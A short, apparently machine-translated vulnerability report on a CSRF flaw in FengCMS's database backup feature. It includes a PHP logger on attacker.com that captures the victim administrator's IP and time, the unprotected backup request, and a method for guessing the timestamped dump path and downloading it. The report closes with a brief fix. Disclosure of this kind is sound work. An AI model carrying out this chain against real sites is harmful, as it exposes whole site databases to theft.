FengCMS CSRF vulnerability can cause database dumping

FengCMS CSRF vulnerability can cause database dumping

Important functions cannot be detached due to lack of csrf token Verification

Detailed description:

The data backup function in the background management does not undergo csrf token verification.

The attacker made the following csrf. php and put it under attacker.com:

<?php
file_put_contents("test.txt",  " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); 
file_put_contents("test.txt",  " Time:".date("Y.m.d H:i:s"),FILE_APPEND); 
?>

Then, the URL http://attacker.com/csrf.phpis sent to the victim (website administrator ). If the Administrator is logged on when the URL is opened, the Administrator sends a backup database request as the target server:

?controller=dbmanage&operate=save&type=0

At the same time, attackers can obtain the approximate time for the Administrator to send the request. (Here, we need to declare that, although the time obtained by attackers is the time of their own servers. However, there is no time difference between servers in a country except Xinjiang. It is also synchronized with the time server. Therefore, you don't need to consider the time difference between the two servers .)

Now the attacker ran to http://attacker.com/test.txt?manager to send the request:

IP:119.72.193.99 Time:2014.07.14 00:48:39

Then, change it to the following format:

A-b-c_def/hour 1. SQL (year-month-day _ hour minute second)

After modification, it is:

2014-07-14_004839/00001.sql

Finally, add the path as follows:

http://10.211.55.4/admin/app/dbbackup/2014-07-14_004839/00001.sql

The local network environment test may have a time difference of about 2 seconds. If it is the Internet, there will certainly be a bigger difference according to the actual network conditions, but it will not be too big. The Unit is second. Therefore, the attacker only needs to gradually modify the number of seconds in the URL from 39 to one second.



Finally, you can download the backup data.

Proof of vulnerability:

The attacker successfully obtained the backup database path and downloaded it:

Solution:

1. The backup file name is too predictable. We recommend that you use more random file names.